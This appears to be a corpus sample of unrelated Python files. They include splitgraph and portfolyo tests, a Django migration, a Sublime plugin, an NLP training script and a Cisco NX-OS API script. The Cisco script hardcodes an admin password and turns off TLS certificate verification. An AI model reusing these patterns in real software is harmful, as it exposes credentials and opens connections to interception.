result = runner.invoke(upgrade_c, ["--force"], catch_exceptions=False)
assert result.exit_code == 0
print(result.output)
assert subprocess.mock_calls == [
call([mock.ANY, "--version"]),
call([mock.ANY, "engine", "upgrade"]),
]
# Call the atexit callback that swaps the new sgr in and check it does that correctly.
# mock_calls is a list of tuples (name, args, kwargs), so grab the first arg
finalize_callback = register.mock_calls[-1][1][0]
assert finalize_callback.__name__ == "_finalize"
finalize_callback()
with open(os.path.join(dir, "sgr")) as f:
assert f.read() == "new sgr client"
with open(os.path.join(dir, "sgr.old")) as f:
assert f.read() == "old sgr client"
def test_rollback_on_error(local_engine_empty):
# For e.g. commit/checkout/other commands, we don't do commits/rollbacks
# in the library itself and expect the caller to manage transactions. In CLI,
# we need to make sure that erroneous transactions (e.g. interrupted SG commits)
# are rolled back correctly instead of being committed.
runner = CliRunner()
OUTPUT.init()
OUTPUT.run_sql("CREATE TABLE test (key INTEGER PRIMARY KEY, value_1 VARCHAR, value_2 INTEGER)")
for i in range(11):
OUTPUT.run_sql("INSERT INTO test VALUES (%s, %s, %s)", (i + 1, chr(ord("a") + i), i * 2))
OUTPUT.commit(chunk_size=5, in_fragment_order={"test": ["key", "value_1"]})
assert len(OUTPUT.images()) == 2
assert len(OUTPUT.objects.get_all_objects()) == 3
_alter_diff_splitting_dataset()
OUTPUT.commit_engines()
# Simulate the commit getting interrupted by the first object going through and being
# recorded, then a KeyboardInterrupt being raised.
called_once = False
def interrupted_register(*args, **kwargs):
nonlocal called_once
if called_once:
raise BaseException("something went wrong")
else:
called_once = True
return FragmentManager._register_object(*args, **kwargs)
with patch(
"splitgraph.core.fragment_manager.FragmentManager._register_object",
side_effect=interrupted_register,
) as ro:
with pytest.raises(BaseException):
runner.invoke(cli, ["commit", OUTPUT.to_schema()])
# Check that no image/object metadata was written
assert len(OUTPUT.images()) == 2
assert len(OUTPUT.objects.get_all_objects()) == 3
assert ro.call_count == 2
# Check that the data in the audit trigger wasn't deleted
assert len(OUTPUT.engine.get_pending_changes(OUTPUT.to_schema(), table="test")) == 6
|
python
|
name = "CheeseBurger"
|
python
|
import json
import requests
from requests.auth import HTTPBasicAuth as BasicAuth
import urllib3
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings(InsecureRequestWarning)
url = "https://sbx-nxos-mgmt.cisco.com:443/ins"
username = "admin"
password = "Admin_1234!"
data = {
"ins_api": {
"version": "1.0",
# Possible values:
# 1- cli_show
# 2- cli_show_array (For multiple show commands at once)
# 3- cli_show_ascii
# 4- cli_conf
"type": "cli_show",
"chunk": "0",
"sid": "1",
"input": "show vlan brief", # any command
"output_format": "json", # or XML
}
}
# POST: Request
response = requests.post(
url=url,
auth=BasicAuth(username, password),
json=data,
verify=False,
)
vlan_brief = response.json()
# Export response to a JSON file
with open(file="vlan-brief-output.json", mode="w") as outfile:
json.dump(obj=vlan_brief, fp=outfile, indent=4)
print("Done")
|
python
|
# Generated by Django 2.1 on 2019-05-15 22:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0006_deviceconfig_last_modify'),
]
operations = [
migrations.AlterField(
model_name='deviceconfig',
name='last_modify',
field=models.DateTimeField(null=True),
),
]
|
python
|
class Diplomacy:
"""
    Represents every player's diplomacy stances with the other players
"""
def __init__(self, stances=None):
"""
Initialize Diplomacy
Args:
            stances (list(int)): stances with the other players
        Note:
            there are 8 stances with the other players
"""
if stances is None:
stances = [3] * 17
self.stances = stances
self.gaia = [0] * 17
def __repr__(self):
name = "Diplomacy:\n"
stances = "\t"
for ind in range(len(self.stances)):
stances += "P{}: {}; ".format(ind, self.stances[ind])
return name + stances
def __setitem__(self, playerIndex, stance):
"""
        Set diplomacy stance with another player
        Args:
            playerIndex (int): index of another player
            stance (int): diplomacy stance (0=allied, 1=neutral, 3=enemy)
"""
self.stances[playerIndex] = stance
def __getitem__(self, playerIndex):
"""
Get diplomacy stance with another player
Args:
playerIndex (int): index of another player
Return:
(int): player stance (0=allied, 1=neutral, 3=enemy)
"""
return self.stances[playerIndex]
def toJSON(self):
"""return JSON"""
data = dict()
for i in range(len(self.stances)):
data[i] = self.stances[i]
return data
def allStances(self, stance):
"""
Set diplomacy stance with all players
Args:
stance (int): diplomacy stance
"""
for i in range(len(self.stances)):
self.stances[i] = stance
def getPlayersByStance(self, stance):
"""
Get Players, which have selected stance
Args:
stance (int): 0=allied, 1=neutral, 3=enemy
Return:
(list(int)): player indexes, which have selected stance
Todo:
describe param stance
"""
result = list()
for ind in range(len(self.stances)):
if self.stances[ind] == stance:
result.append(ind)
return result
def allies(self):
"""
Get all players indexes with ally stance (0)
Return:
(list(int)): player indexes, which are allies
"""
return self.getPlayersByStance(0)
def neutrals(self):
"""
Get all players indexes with neutral stance (1)
Return:
(list(int)): player indexes, which are neutrals
"""
return self.getPlayersByStance(1)
def enemies(self):
"""
        Get all players indexes with enemy stance (3)
Return:
(list(int)): player indexes, which are enemies
"""
return self.getPlayersByStance(3)
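# Illustrative usage sketch (not part of the original file):
#
#   diplomacy = Diplomacy()           # every slot starts as enemy (stance 3)
#   diplomacy[2] = 0                  # mark player 2 as an ally
#   assert diplomacy.allies() == [2]
#   diplomacy.allStances(1)           # set everyone to neutral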
|
python
|
from portfolyo import dev, testing
from portfolyo.tools import frames
from numpy import nan
import portfolyo as pf
import numpy as np
import pandas as pd
import pytest
@pytest.mark.parametrize("series_or_df", ["series", "df"])
@pytest.mark.parametrize("bound", ["right", "left"])
@pytest.mark.parametrize(
("in_vals_num_specialconditions", "start"), # normal, WT->ST, ST->WT
[(96, "2020-03-01"), (92, "2020-03-29"), (100, "2020-10-25")],
)
@pytest.mark.parametrize("in_aware", [True, False])
@pytest.mark.parametrize("in_tz", ["Europe/Berlin", "Asia/Kolkata"])
@pytest.mark.parametrize("force", ["agnostic", "aware"])
@pytest.mark.parametrize("freq", ["15T", "D"])
def test_standardize(
in_vals_num_specialconditions: int,
start: str,
bound: str,
in_aware: bool,
in_tz: str,
series_or_df: str,
force: str,
freq: str,
):
"""Test if series and dataframes are correctly standardized to tz-aware, for
quarterhour timeseries with/without DST."""
if not in_aware and in_tz != "Europe/Berlin":
return # cannot convert tz-naive fr to different timezone
if freq == "D":
in_vals_num = 200
elif force == "agnostic" and in_tz != "Europe/Berlin":
in_vals_num = 96
else:
in_vals_num = in_vals_num_specialconditions
in_vals = np.random.random(in_vals_num)
# Prepare expected output frame.
out_tz = "Europe/Berlin" if force == "aware" else None
if force == "aware" or freq == "D":
out_vals = in_vals
else: # always return 96 values
a, b = (12, -84) if in_vals_num_specialconditions == 100 else (8, -88)
out_vals = [*in_vals[:a], *in_vals[b:]]
iout = pd.date_range(start, freq=freq, periods=len(out_vals), tz=out_tz)
expected = pd.Series(out_vals, iout.rename("ts_left"))
if series_or_df == "df":
expected = pd.DataFrame({"a": expected})
# Prepare input frame.
if force == "aware":
out_tz = "Europe/Berlin"
else:
out_tz = in_tz
iin = pd.date_range(start, freq=freq, periods=len(in_vals), tz=out_tz)
if out_tz != in_tz and freq == "D":
return # cannot test because not at day boundary.
iin = iin.tz_convert(in_tz).rename("the_time_stamp")
if not in_aware:
iin = iin.tz_localize(None)
if bound == "right":
td = pd.Timedelta(hours=24 if freq == "D" else 0.25)
iin = pd.DatetimeIndex([*iin[1:], iin[-1] + td])
kw = {"bound": bound, "floating": False, "tz": out_tz}
# Do actual tests.
if isinstance(expected, pd.Series):
# 1: Using expected frame: should stay the same.
result = frames.standardize(expected, force)
pd.testing.assert_series_equal(result, expected)
# 2: Series.
result = frames.standardize(pd.Series(in_vals, iin), force, **kw)
pd.testing.assert_series_equal(result, expected)
else:
# 1: Using expected frame: should stay the same.
result = frames.standardize(expected, force)
pd.testing.assert_frame_equal(result, expected)
# 2: Dataframe with index.
result = frames.standardize(pd.DataFrame({"a": in_vals}, iin), force, **kw)
pd.testing.assert_frame_equal(result, expected)
# 3: Dataframe with column that must become index.
result = frames.standardize(
pd.DataFrame({"a": in_vals, "t": iin}), force, index_col="t", **kw
)
pd.testing.assert_frame_equal(result, expected)
@pytest.mark.parametrize("series_or_df", ["series", "df"])
@pytest.mark.parametrize("removesome", [0, 1, 2]) # 0=none, 1=from end, 2=from middle
@pytest.mark.parametrize("tz", [None, "Europe/Berlin", "Asia/Kolkata"])
@pytest.mark.parametrize("floating", [True, False])
@pytest.mark.parametrize("bound", ["left", "right"])
@pytest.mark.parametrize("freq", [*pf.FREQUENCIES, "Q", "30T", "M", "AS-FEB"])
def test_standardize_aware_error(freq, tz, removesome, floating, series_or_df, bound):
"""Test raising errors on incorrect frequencies or indices with gaps."""
must_raise = False
# Get index.
while True:
i = dev.get_index(freq, tz)
if len(i) > 10:
break
# If no timezone specified and below-daily values, the created index will have too few/many datapoints.
if not tz and pf.freq_up_or_down(freq, "D") > 1:
return # don't check this edge case
if tz == "Asia/Kolkata" and pf.freq_shortest(freq, "H") == "H" and not floating:
# Kolkata and Berlin timezone only share 15T-boundaries. Therefore, any other
# frequency should raise an error.
must_raise = True
# remove timestamp from index.
if removesome == 1: # remove one from end or start
i = i.delete(np.random.choice([0, len(i) - 1]))
elif removesome == 2: # remove max 3 from middle
i = i.delete(np.random.randint(2, len(i) - 2, 3))
must_raise = True
# Add values.
if series_or_df == "series":
fr = dev.get_series(i)
else:
fr = dev.get_dataframe(i)
# See if error is raised.
if freq not in pf.FREQUENCIES or must_raise:
with pytest.raises(ValueError):
_ = frames.standardize(fr, "aware", bound, floating=floating)
return
result = frames.standardize(fr, "aware", bound, floating=floating)
assert result.index.freq == freq
@pytest.mark.parametrize(
("values", "maxgap", "gapvalues"),
[
([1, 2, 3, 4, 25, 7, 8], 1, []),
([1, 2, 3, 4, nan, 7, 8], 1, [5.5]),
([1, 2, 3, 4, nan, 7, 8], 2, [5.5]),
([1, 2, 3, 4, nan, 7, 8], 3, [5.5]),
([3, 2, 1, nan, nan, 7, 8], 1, [nan, nan]),
([3, 2, 1, nan, nan, 7, 8], 2, [3, 5]),
([3, 2, 1, nan, nan, 7, 8], 3, [3, 5]),
([nan, 2, 1, nan, nan, 7, nan], 1, [nan, nan, nan, nan]),
([nan, 2, 1, nan, nan, 7, nan], 2, [nan, 3, 5, nan]),
],
)
@pytest.mark.parametrize(
("index", "tol"),
[
(range(7), 0),
(range(-3, 4), 0),
(pd.date_range("2020", periods=7, freq="D"), 0),
(pd.date_range("2020", periods=7, freq="M", tz="Europe/Berlin"), 0.04),
],
)
def test_fill_gaps(values, index, maxgap, gapvalues, tol):
"""Test if gaps are correctly interpolated."""
# Test as Series.
s = pd.Series(values, index)
s_new = frames.fill_gaps(s, maxgap)
s[s.isna()] = gapvalues
pd.testing.assert_series_equal(s_new, s, rtol=tol)
# Test as DataFrame.
df = pd.DataFrame({"a": values}, index)
df_new = frames.fill_gaps(df, maxgap)
df[df.isna()] = gapvalues
pd.testing.assert_frame_equal(df_new, df, rtol=tol)
@pytest.mark.parametrize(
("df_columns", "header", "expected_columns"),
[
(["A"], "B", [("B", "A")]),
(["A1", "A2"], "B", [("B", "A1"), ("B", "A2")]),
(pd.MultiIndex.from_tuples([("B", "A")]), "C", [("C", "B", "A")]),
(
pd.MultiIndex.from_product([["B"], ["A1", "A2"]]),
"C",
[("C", "B", "A1"), ("C", "B", "A2")],
),
(
pd.MultiIndex.from_tuples([("B1", "A1"), ("B2", "A2")]),
"C",
[("C", "B1", "A1"), ("C", "B2", "A2")],
),
],
)
def test_addheader_tocolumns(df_columns, header, expected_columns):
"""Test if header can be added to the columns of a dataframe."""
i = dev.get_index()
df_in = pd.DataFrame(np.random.rand(len(i), len(df_columns)), i, df_columns)
result_columns = frames.add_header(df_in, header).columns.to_list()
assert np.array_equal(result_columns, expected_columns)
# TODO: put in ... fixture (?)
test_index_D = dev.get_index("D")
test_index_D_deconstructed = test_index_D.map(lambda ts: (ts.year, ts.month, ts.day))
test_index_H = dev.get_index("H")
test_index_H_deconstructed = test_index_H.map(lambda ts: (ts.year, ts.month, ts.day))
@pytest.mark.parametrize(
("df_index", "header", "expected_index"),
[
(test_index_D, "test", [("test", i) for i in test_index_D]),
(
test_index_D_deconstructed,
"test",
[("test", *i) for i in test_index_D_deconstructed],
),
(test_index_H, "test", [("test", i) for i in test_index_H]),
(
test_index_H_deconstructed,
"test",
[("test", *i) for i in test_index_H_deconstructed],
),
],
)
def test_addheader_torows(df_index, header, expected_index):
"""Test if header can be added to the rows of a dataframe."""
df_in = pd.DataFrame(np.random.rand(len(df_index), 2), df_index, ["A", "B"])
result_index = frames.add_header(df_in, header, axis=0).index.to_list()
assert np.array_equal(result_index, expected_index)
# TODO: put in ... fixture (?)
test_values = np.random.rand(len(test_index_D), 10)
test_df_1 = pd.DataFrame(test_values[:, :2], test_index_D, ["A", "B"])
test_df_2 = pd.DataFrame(test_values[:, 2], test_index_D, ["C"])
expect_concat_12 = pd.DataFrame(test_values[:, :3], test_index_D, ["A", "B", "C"])
test_df_3 = pd.DataFrame(test_values[:, 2], test_index_D, pd.Index([("D", "C")]))
expect_concat_13 = pd.DataFrame(
test_values[:, :3], test_index_D, pd.Index([("A", ""), ("B", ""), ("D", "C")])
)
@pytest.mark.parametrize(
("dfs", "axis", "expected"),
[
([test_df_1, test_df_2], 1, expect_concat_12),
([test_df_1, test_df_3], 1, expect_concat_13),
],
)
def test_concat(dfs, axis, expected):
"""Test if concatenation works as expected."""
result = frames.concat(dfs, axis)
testing.assert_frame_equal(result, expected)
@pytest.mark.parametrize("weightsas", ["none", "list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries1(weightsas, axis):
"""Test if weighted average of a series is correctly calculated."""
values = pd.Series([100, 200, 300, -150])
weights = [10, 10, 10, 20]
if weightsas == "none":
weights = None
expected_result = 112.5
elif weightsas == "list":
expected_result = 60
elif weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
expected_result = 110
assert np.isclose(frames.wavg(values, weights, axis), expected_result)
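# Sanity check of the expected values above: with no weights the plain mean is
# (100 + 200 + 300 - 150) / 4 = 112.5; with list weights [10, 10, 10, 20] the result is
# (100*10 + 200*10 + 300*10 - 150*20) / 50 = 3000 / 50 = 60; and when the weights are a
# Series with reversed index [3, 2, 1, 0] they align by label, giving
# (100*20 + 200*10 + 300*10 - 150*10) / 50 = 5500 / 50 = 110.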
@pytest.mark.parametrize("weightsas", ["list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries2(weightsas, axis):
"""Test if weighted average of a series is correctly calculated."""
values = pd.Series([100, 200, 300, -150])
weights = [10, 0, 10, 20]
if weightsas == "list":
expected_result = 25
elif weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
expected_result = 62.5
assert np.isclose(frames.wavg(values, weights, axis), expected_result)
@pytest.mark.parametrize("weightsas", ["list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries_na(weightsas, axis):
"""Test if weighted average of a series is correctly identified as error,
when all weights are 0 but not all values are equal."""
values = pd.Series([100, 200, 300, -150])
weights = [0, 0, 0, 0]
if weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
assert np.isnan(frames.wavg(values, weights, axis))
@pytest.mark.parametrize("weightsas", ["list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries_0weights(weightsas, axis):
"""Test if weighted average of a series is correctly calculated,
when all weights are 0 and all values are equal."""
values = pd.Series([100, 100, 100, 100])
weights = [0, 0, 0, 0]
if weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
assert frames.wavg(values, weights, axis) == 100
@pytest.mark.parametrize("weightsas", ["none", "list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe1(weightsas, axis):
"""Test if weighted average of a dataframe is correctly calculated."""
values = pd.DataFrame({"a": [100, 200, 300, -150], "b": [100, -200, 300, -150]})
if weightsas == "none":
weights = None
if axis == 0:
expected_result = pd.Series({"a": 112.5, "b": 12.5})
else:
expected_result = pd.Series([100, 0, 300, -150])
if weightsas == "list":
if axis == 0:
weights = [10, 10, 10, 20]
expected_result = pd.Series({"a": 60, "b": -20})
else:
weights = [10, 30]
expected_result = pd.Series([100, -100, 300, -150])
if weightsas == "series":
if axis == 0:
weights = pd.Series([10, 10, 10, 20], index=[3, 2, 1, 0])
expected_result = pd.Series({"a": 110, "b": 30})
else:
weights = pd.Series({"b": 30, "a": 10})
expected_result = pd.Series([100, -100, 300, -150])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [10, 10, 10, 20], "b": [10, 10, 30, 0]})
if axis == 0:
expected_result = pd.Series({"a": 60, "b": 160})
else:
expected_result = pd.Series([100, 0, 300, -150])
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
@pytest.mark.parametrize("weightsas", ["list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe2(weightsas, axis):
"""Test if weighted average of a dataframe is correctly calculated."""
values = pd.DataFrame({"a": [100, 200, 200, -150], "b": [100, -200, 300, -150]})
if weightsas == "list":
if axis == 0:
weights = [10, 10, 0, 20]
expected_result = pd.Series({"a": 0, "b": -100})
else:
weights = [10, 0]
expected_result = pd.Series([100, 200, 200, -150])
if weightsas == "series":
if axis == 0:
weights = pd.Series([10, 10, 0, 20], index=[3, 2, 1, 0])
expected_result = pd.Series({"a": 62.5, "b": 87.5})
else:
weights = pd.Series({"b": 0, "a": 10})
expected_result = pd.Series([100, 200, 200, -150])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [10, 10, 0, 20], "b": [10, 10, 30, 0]})
if axis == 0:
expected_result = pd.Series({"a": 0, "b": 160})
else:
expected_result = pd.Series([100, 0, 300, -150])
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
@pytest.mark.parametrize("weightsas", ["list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe_na(weightsas, axis):
"""Test if weighted average of a dataframe is correctly is correctly identified as error,
when all weights are 0 but not all values are equal."""
values = pd.DataFrame({"a": [130, 200, 200, -160], "b": [100, -200, 300, -150]})
if axis == 0:
weights = [0, 0, 0, 0]
expected_result = pd.Series({"a": np.nan, "b": np.nan})
else:
weights = [0, 0]
expected_result = pd.Series([np.nan, np.nan, np.nan, np.nan])
if weightsas == "series":
if axis == 0:
weights = pd.Series(weights, index=[3, 2, 1, 0])
else:
weights = pd.Series(weights, index=["a", "b"])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [0, 0, 0, 0], "b": [0, 0, 0, 0]})
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
@pytest.mark.parametrize("weightsas", ["list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe_0weights(weightsas, axis):
"""Test if weighted average of a dataframe is correctly is correctly identified as error,
when all weights are 0. Some averages are calculated from identical values and should
result in that value."""
values = pd.DataFrame({"a": [100, 200, 200, -150], "b": [100, -200, 300, -150]})
if axis == 0:
weights = [0, 0, 0, 0]
expected_result = pd.Series({"a": np.nan, "b": np.nan})
else:
weights = [0, 0]
expected_result = pd.Series([100, np.nan, np.nan, -150])
if weightsas == "series":
if axis == 0:
weights = pd.Series(weights, index=[3, 2, 1, 0])
else:
weights = pd.Series(weights, index=["a", "b"])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [0, 0, 0, 0], "b": [0, 0, 0, 0]})
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
vals1 = np.array([1, 2.0, -4.1234, 0])
vals2 = np.array([1, 2.0, -4.1234, 0.5])
@pytest.mark.parametrize(
("s1", "s2", "expected_result"),
[
(pd.Series(vals1), pd.Series(vals1), True),
(pd.Series(vals1), pd.Series(vals2), False),
(pd.Series(vals1), pd.Series(vals1, dtype="pint[MW]"), False),
(pd.Series(vals1).astype("pint[MW]"), pd.Series(vals1, dtype="pint[MW]"), True),
(
pd.Series(vals1 * 1000).astype("pint[kW]"),
pd.Series(vals1, dtype="pint[MW]"),
True,
),
(
pd.Series(vals1 * 1000).astype("pint[MW]"),
pd.Series(vals1, dtype="pint[MW]"),
False,
),
],
)
def test_series_allclose(s1, s2, expected_result):
"""Test if series can be correctly compared, even if they have a unit."""
assert frames.series_allclose(s1, s2) == expected_result
|
python
|
import sublime
import traceback
from ui.read import settings as read_settings
from ui.write import write, highlight as write_highlight
from lookup import file_type as lookup_file_type
from ui.read import x as ui_read
from ui.read import spots as read_spots
from ui.read import regions as ui_regions
from core.read import read as core_read
from structs.general_thread import *
from structs.thread_handler import *
from structs.highlight_list import *
from structs.flag_region import *
from core.analyse import analyse
def flags():
return [
FlagRegion('bolt.incorrect', 'comment', 'light_x', 0),
FlagRegion('bolt.missing', 'string', 'arrow_right', 0),
FlagRegion('bolt.unused', 'comment', 'dot', sublime.DRAW_OUTLINED),
FlagRegion('bolt.wrong_module', 'comment', 'light_x', 0)
]
def highlight_setting():
return 'bolt.live.highlight'
def rate_setting():
return 'bolt.live.highlight.rate'
def is_enabled():
settings = read_settings.load_settings()
return settings.get(highlight_setting(), False)
def get_rate():
settings = read_settings.load_settings()
return settings.get(rate_setting(), 1000)
def set_enabled(state):
settings = read_settings.load_settings()
settings.set(highlight_setting(), state)
write.save_settings()
def toggle(view):
def noop(v):
return True
handler = ThreadHandler(noop, noop, noop)
prev = is_enabled()
current = not prev
if (current):
run(view, handler)
else:
clear(view)
set_enabled(current)
def run(view, handler):
valid = lookup_file_type.is_bolt_module(view)
if not valid:
        open_file = view.file_name() if view.file_name() is not None else '-- no view'
print 'View is not a bolt module: ' + open_file
handler.cancel()
else:
read_view = ui_read.all(view)
spots = read_spots.spots(view)
plasmas = core_read.plasmas(read_view.ptext)
def update_ui(highlights, module_wrong):
def run():
regions = write_highlight.regions(view, highlights)
module_region = [ui_regions.module_name(view)] if module_wrong else []
flag_info = zip(flags(), [regions.incorrect, regions.missing, regions.unused, module_region])
def highlight_flag(x):
if len(x[1]) > 0:
                        write_highlight.highlight(view, x[1], x[0])
else:
write_highlight.remove_highlight(view, x[0])
map(highlight_flag, flag_info)
sublime.set_timeout(run, 0)
thread = GeneralThread(_highlighter(read_view, spots, plasmas, update_ui), handler.success, handler.failure)
sublime.set_timeout(thread.start, 0)
handler.init(thread)
def clear(view):
def run():
write_highlight.remove_highlights(view, flags())
sublime.set_timeout(run, 0)
def _highlighter(read_view, spots, plasmas, callback):
def r():
try:
highlights = analyse.all(read_view.base, read_view.nests, plasmas, spots, read_view.external)
module_wrong = analyse.module_wrong(read_view)
callback(highlights, module_wrong)
except Exception as exc:
print "Error during identifying highlighted regions: " + str(exc)
traceback.print_exc(limit=10)
callback(HighlightLists([], [], []), False)
return r
|
python
|
import random, time, torch
import numpy as np
from nlplingo.oregon.event_models.uoregon.define_opt import opt
from nlplingo.oregon.event_models.uoregon.tools.utils import *
from nlplingo.oregon.event_models.uoregon.models.pipeline._01.readers import read_abstract_train_data
from nlplingo.oregon.event_models.uoregon.models.pipeline._01.trainers import *
opt['train_on_arb'] = 1
opt['train_strategy'] = 'retrain.add-all'
opt['initialize_with_pretrained'] = 1
opt['finetune_on_arb'] = 1
opt['observed_train'] = 'datasets/8d/update2/arabic-wa-corpus.bp.json'
opt['dev_file'] = 'datasets/8d/update2/arabic-abstract-sample.bp.json'
assert opt['co_train_lambda'] == 0
assert opt['input_lang'] == 'arabic'
""" opt:
ED_eval_epoch : 0
argument_eval_epoch : 0
bad_threshold : 0.4
batch_size : 16
biw2v_map_dir : resources/aligned_w2v
biw2v_size : 354186
biw2v_vecs : [[ 0.00000000e+00 0.00000000e+00 0.00000000e+00 ... 0.00000000e+00
0.00000000e+00 0.00000000e+00]
[ 8.26119033e-01 3.68800311e-01 8.69561242e-01 ... 2.70505650e-01
2.05427664e-01 2.01526267e-01]
[ 1.33400000e-03 1.47300000e-03 -1.27700000e-03 ... -4.37000000e-04
-5.52000000e-04 1.02400000e-03]
...
[-1.15833000e-01 -8.17270000e-02 -5.58370000e-02 ... -1.59482000e-01
-3.43660000e-02 6.65400000e-03]
[-3.82970000e-02 -5.19210000e-02 -7.23600000e-02 ... -1.40313000e-01
1.73640000e-02 1.28790000e-02]
[-1.11085000e-01 -4.86380000e-02 -8.37620000e-02 ... -1.55592000e-01
6.28500000e-03 3.66210000e-02]]
ckpt_dir : checkpoints
co_train_lambda : 0
context_layer : lstm
cross_valid :
data : abstract
data_map : None
datapoint_dir : datapoints
delete_nonbest_ckpts : 1
deprel_dim : 30
dev_file : datasets/8d/update2/arabic-abstract-sample.bp.json
device : cuda
dist_dim : 30
do_exp : default
docker_run : 0
dropout_xlmr : 0.1
edge_lambda : 0.1
ensemble_mode : 0
ensemble_seeds : ['seed-2021', 'seed-2022', 'seed-2023', 'seed-2024', 'seed-2025']
finetune_biw2v : 0
finetune_on_arb : 1
finetune_xlmr : 1
finetuned_xlmr_layers : ['xlmr_embedding.model.decoder.sentence_encoder.embed_tokens',
'xlmr_embedding.model.decoder.sentence_encoder.embed_positions', 'self_att.attention_layers', 'gcn_layer',
'biw2v_embedding', 'xlmr_embedding.model.decoder.sentence_encoder.layers.0.',
'xlmr_embedding.model.decoder.sentence_encoder.layers.1.',
'xlmr_embedding.model.decoder.sentence_encoder.layers.2.',
'xlmr_embedding.model.decoder.sentence_encoder.layers.3.']
gcn_dropout : 0.5
get_perf_of_separate_models : 0
grad_clip_xlmr : 0
hidden_dim : 200
hidden_eval : 0
inhouse_eval : 0
initialize_with_pretrained : 1
input_lang : arabic
lambda_mix : 0.8
log_dir : logs
log_name : train.log.arg.arabic-wa-corpus
lr : 2e-05
lstm_add_satt : 0
lstm_by_satt : 0
lstm_layers_entity : 1
lstm_layers_event : 1
lstm_layers_trigger : 4
max_grad_norm : 5.0
mode : None
model : pipeline-01
ner_dim : 30
num_epoch : 10
num_first_xlmr_layers : 5
num_last_layer_xlmr : 1
observed_train : datasets/8d/update2/arabic-wa-corpus.bp.json
optim : adam
output_file : None
output_format : json
output_offsets : 1
params : None
position_embed_for_satt : 1
prune_tree : 0
readers_mode : 1
remove_incomplete : 0
save_last_epoch : 1
seed : 2020
self_att_d_qkv : 200
self_att_dropout : 0.1
self_att_heads : 1
self_att_layers : 6
stanford_resource_dir : resources/stanford
test_file : None
test_is_dir : False
train_ED : 0
train_argument : 1
train_file : app/train_data.bp.json
train_is_dir : True
train_on_arb : 1
train_strategy : retrain.add-all
trainer : trigger
upos_dim : 30
use_biw2v : 0
use_cased_entity : 1
use_dep2sent : 0
use_dep_edge : 0
use_elmo : 0
use_ner : 0
xlmr_model_dir : models/xlmr.base
xlmr_version : xlmr.base
xpos_dim : 30
"""
data_map = read_abstract_train_data(opt['observed_train'], opt['dev_file'])
opt['data_map'] = data_map
# ************* ED model *****************
if opt['train_ED']:
torch.autograd.set_detect_anomaly(True)
random.seed(opt['seed'])
np.random.seed(opt['seed'])
torch.manual_seed(opt['seed'])
torch.cuda.manual_seed(opt['seed'])
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
ED_trainer = EDTrainer(opt)
if opt['get_perf_of_separate_models']:
ED_trainer.eval_with_saved_model()
else:
ED_trainer.train()
# ************* argument model *****************
if opt['train_argument']:
torch.autograd.set_detect_anomaly(True)
random.seed(opt['seed'])
np.random.seed(opt['seed'])
torch.manual_seed(opt['seed'])
torch.cuda.manual_seed(opt['seed'])
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
arg_trainer = ArgumentTrainer(opt)
if opt['get_perf_of_separate_models']:
arg_trainer.eval_with_saved_model()
else:
arg_trainer.train()
if not opt['get_perf_of_separate_models']:
print('Training done!')
|
python
|
from dbnd._core.cli.click_utils import _help
from dbnd._core.cli.service_auto_completer import completer
from dbnd._core.task_build.task_registry import get_task_registry
from dbnd._vendor import click
@click.command()
@click.argument("search", default="", autocompletion=completer.config())
@click.option("--module", "-m", help="Used for dynamic loading of modules")
@click.pass_context
def show_configs(ctx, module, search):
"""Show and search configurations"""
_list_tasks(ctx, module, search, is_config=True)
@click.command()
@click.argument("search", default="", autocompletion=completer.task())
@click.option("--module", "-m", help="Used for dynamic loading of modules")
@click.pass_context
def show_tasks(ctx, module, search):
"""Show and search tasks"""
_list_tasks(ctx, module, search, is_config=False)
COMMON_PARAMS = {"task_version", "task_env", "task_target_date"}
def _list_tasks(ctx, module, search, is_config):
from dbnd import Config
from dbnd._core.parameter.parameter_definition import _ParameterKind
from dbnd._core.context.databand_context import new_dbnd_context
formatter = ctx.make_formatter()
with new_dbnd_context(module=module):
tasks = get_task_registry().list_dbnd_task_classes()
for task_cls in tasks:
td = task_cls.task_definition
full_task_family = td.full_task_family
task_family = td.task_family
if not (task_family.startswith(search) or full_task_family.startswith(search)):
continue
if issubclass(task_cls, Config) != is_config:
continue
dl = []
for param_name, param_obj in td.task_param_defs.items():
if param_obj.system or param_obj.kind == _ParameterKind.task_output:
continue
if not is_config and param_name in COMMON_PARAMS:
continue
param_help = _help(param_obj.description)
dl.append((param_name, param_help))
if dl:
with formatter.section(
"{task_family} ({full_task_family})".format(
full_task_family=full_task_family, task_family=task_family
)
):
formatter.write_dl(dl)
click.echo(formatter.getvalue().rstrip("\n"))
|
python
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The page cycler v2.
For details, see design doc:
https://docs.google.com/document/d/1EZQX-x3eEphXupiX-Hq7T4Afju5_sIdxPWYetj7ynd0
"""
from core import perf_benchmark
import page_sets
